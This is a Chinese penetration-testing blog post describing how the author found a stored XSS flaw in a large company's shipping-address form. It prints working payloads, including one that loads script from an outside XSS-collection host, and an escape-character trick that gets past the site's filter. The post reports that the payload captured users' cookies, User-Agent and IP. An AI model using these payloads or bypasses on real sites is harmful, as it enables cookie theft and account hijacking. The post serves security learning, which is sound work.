0x01 找到存在XSS的位置
沒什么技巧,見到框就X,功夫不負(fù)有心人,在目標(biāo)網(wǎng)站編輯收貨地址處發(fā)現(xiàn)了存在XSS的地方,沒想到這種大公司還會(huì)存在XSS。
使用的XSS代碼:<img src=1 onerror=alert(1)>

0x02 構(gòu)造XSS代碼連接到XSS平臺(tái)
XSS平臺(tái)給我們的XSS代碼是這樣的:
</tExtArEa>'"><sCRiPt sRC=https://xss8.cc/3Ri4></sCrIpT>

直接插入的話會(huì)提示參數(shù)非法,經(jīng)過多次嘗試,最后發(fā)現(xiàn)該平臺(tái)會(huì)對(duì)雙引號(hào)、script字符進(jìn)行識(shí)別過濾,大小寫會(huì)被過濾,于是嘗試插入下面的語句:
</tExtArEa>'\"><\sCRiPt sRC=https://xss8.cc/3Ri4></\sCrIpT>
這條代碼比上面平臺(tái)給的XSS代碼的多了幾個(gè) "\",也就是轉(zhuǎn)義字符,利用轉(zhuǎn)義字符可以繞過該平臺(tái)的策略,因?yàn)榻?jīng)驗(yàn)不足,所以在這一步嘗試了很多種辦法都沒能繞過,要不有的可以插入但是連不上XSS平臺(tái),要不有的就是被識(shí)別攔截。

加上轉(zhuǎn)義字符成功插入后,刷新目標(biāo)網(wǎng)站與XSS平臺(tái)頁面,在XSS平臺(tái)就能看到剛才的訪問記錄。

這里可以獲取該登陸用戶的Cookie、User-Agent、IP地址什么的,但是觸發(fā)這個(gè)XSS需要登陸存在XSS的賬號(hào)才行,所以個(gè)人覺著知道了這個(gè)Cookie也沒啥用。
并且雖然知道這里存在XSS,但是觸發(fā)條件是需要知道用戶名和密碼,然后來到收貨地址頁面,所以個(gè)人感覺作用不大,因此在想這個(gè)漏洞還有沒有其他的利用價(jià)值,后續(xù)或許會(huì)繼續(xù)更新本次滲透過程,如果你有什么好的想法,歡迎下方留言。
更多信息歡迎關(guān)注微信公眾號(hào):TeamsSix
本文僅用作學(xué)習(xí)交流目的,請(qǐng)勿用作違法目的
原文地址:https://www.teamssix.com/year/190703-221956.html